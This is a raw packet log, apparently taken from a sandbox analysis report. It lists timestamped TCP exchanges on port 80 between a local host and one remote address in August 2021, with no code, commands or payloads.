Aug 24, 2021 08:49:23.842065096 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.842067957 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.842111111 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862231016 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862268925 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862289906 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862314939 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862337112 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862358093 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862371922 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862380981 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862404108 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862423897 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862432957 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862446070 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862467051 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862473965 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862490892 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862499952 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862514019 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862528086 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862535000 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862555981 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862561941 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862574100 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862595081 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862595081 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862615108 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862632990 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862634897 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862662077 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862663031 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862687111 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862701893 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862706900 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862728119 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862736940 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862746954 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862762928 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862767935 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862790108 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862803936 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862811089 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862835884 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862838984 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862858057 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862878084 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862880945 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862901926 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862917900 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862921953 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862942934 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862955093 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.862963915 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862983942 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.862987995 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.863008976 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.863027096 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.863033056 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.863049984 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.863055944 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.863094091 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.883320093 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883362055 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883388042 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883413076 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883435011 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883457899 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883480072 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883505106 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883523941 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.883528948 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883550882 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883569002 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.883578062 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883600950 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883609056 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.883621931 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883637905 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.883645058 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883667946 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883667946 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.883692026 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883708000 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.883713961 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883735895 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883739948 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.883759975 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883778095 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.883783102 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883806944 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883824110 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.883827925 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883846045 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.883851051 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883874893 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883883953 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.883893967 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883913994 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883932114 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.883938074 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883960009 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.883974075 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.883984089 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884002924 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884008884 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884032965 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884063005 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884069920 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884078979 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884103060 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884104013 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884126902 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884129047 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884147882 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884152889 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884176016 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884176016 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884197950 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884201050 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884224892 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884248972 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884268999 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884270906 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884279966 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884284019 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884295940 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884320021 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884320974 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884345055 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884366989 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884367943 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884388924 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884412050 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884412050 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884433031 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884437084 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884460926 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884481907 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884485006 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884511948 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884516954 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884533882 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884557962 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884557962 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884582996 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884604931 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884608030 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884627104 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884630919 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884654999 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884664059 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884680033 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884690046 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884706974 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884726048 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884731054 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884752989 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884763002 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884778023 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884800911 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884805918 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884824038 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884846926 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884846926 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884870052 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884890079 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884896040 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884916067 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884921074 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884943962 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884962082 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.884968996 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884994030 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.884994030 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.885016918 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.885040045 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.885040998 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.885063887 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.885075092 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.885090113 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.885109901 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.885113955 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.885138035 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.885145903 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.885173082 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.905404091 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905519009 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905543089 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905543089 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.905560970 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905582905 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905605078 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.905627012 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.905632019 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905651093 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905666113 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905668020 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.905682087 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905695915 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.905697107 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905718088 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905735016 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905736923 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.905750036 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905765057 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.905766964 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905781984 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905797005 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905812979 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905819893 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.905829906 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905848980 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905858040 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.905865908 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905880928 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905884981 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.905896902 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905911922 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905924082 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.905926943 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905942917 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905952930 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.905958891 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905977964 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.905986071 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.905996084 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906013966 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906023979 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906044960 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906053066 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906060934 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906075954 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906091928 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906107903 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906111002 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906124115 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906138897 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906145096 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906156063 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906172991 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906174898 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906193972 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906208992 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906213045 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906224966 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906235933 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906239986 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906255007 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906265020 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906270981 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906282902 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906294107 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906305075 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906317949 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906331062 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906337023 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906347990 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906363964 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906375885 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906379938 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906392097 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906404018 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906413078 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906419992 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906424999 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906441927 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906456947 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906460047 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906472921 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906488895 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906491041 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906538963 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906546116 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906553984 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906573057 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906588078 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906595945 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906605005 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906621933 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906629086 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906637907 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906641960 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906653881 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906666040 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906682014 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906683922 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906697989 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906711102 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906728029 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906728983 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906743050 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906759024 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906766891 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906775951 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906790972 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906797886 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906806946 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906821966 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906831980 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906838894 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906855106 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906871080 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906873941 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906888008 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906903028 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906909943 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906922102 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906924963 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906939030 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906955004 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906968117 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906980991 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.906985044 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.906987906 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907005072 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907023907 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907041073 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907058954 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907077074 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907092094 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907109022 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907149076 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907166958 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907176018 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907183886 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907191992 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907196045 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907197952 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.907198906 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907202005 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907205105 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.907217979 CEST	80	49718	188.34.200.103	192.168.2.5
